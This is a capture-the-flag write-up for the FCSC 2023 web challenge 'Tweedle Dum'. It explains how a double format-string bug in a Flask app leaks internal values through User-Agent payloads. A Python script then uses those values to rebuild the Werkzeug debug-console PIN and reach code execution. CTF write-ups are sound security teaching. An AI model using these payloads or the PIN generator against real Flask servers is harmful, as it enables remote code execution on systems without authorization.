---
title: "FCSC-2023 - Web - Tweedle Dum"
slug: "/fcsc-2023/tweedle-dum"
date: "2023-05-01"
tags: ["FCSC", "FCSC 2023", "Web", "Python"]
---

The main endpoint of the app:
```python
@app.route("/")
def hello_agent():
    ua = request.user_agent
    return render_template("index.html", msg=f"Hello {ua}".format(ua=ua))
```
We can see a `format string (f)`, and a `.format`, so the variable "ua" is replaced twice.
We can use this to include any part of the application in this page but no code execution.

Because Flask in run in debug mode, there is a console available on the endpoint `/console`, but is protected by a pin code.
However, the PIN generation function uses variables that we can find by reading variables on the server.

First of all, we need to access the "sys" modules as he has a list of other loaded modules that contain variables to generate the pin code.
```
Sys Module: {ua.__annotations__[language].__init__.__globals__[sys]}
```

Then, we can find required information available on the different modules:
```
Module Name: {ua.__annotations__[language].__init__.__globals__[sys].modules[flask].current_app.__class__.__module__}
File path: {ua.__annotations__[language].__init__.__globals__[sys].modules[flask.app].__file__}
Node Name: {ua.__annotations__[language].__init__.__globals__[sys].modules[uuid]._node}
Machine ID: {ua.__annotations__[language].__init__.__globals__[sys].modules[werkzeug].debug._machine_id}
```

Once we collected all those information we can generate the pin code, access the console and read the flag:
```python
import hashlib
from itertools import chain
probably_public_bits = [
    'guest', # username (in Dockerfile)
    'flask.app', # Module Name
    'Flask',
    '/usr/local/lib/python3.10/site-packages/flask/app.py' # getattr(mod, '__file__', None), File path
]

private_bits = [
    '2485378221058', # Node Name
    'c38f89ee-6f6b-4fff-ae2d-556149dc2d94' # Machine ID
]

h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)
```

Then, with the generated pin code `144-398-134` we can connect to the console 
and read the flag in the current folder using python code directly.

Note: as the application is running in a container that has been recreated during the event,
the collected information may be different as well as the pin code.

Reference:
- https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/werkzeug
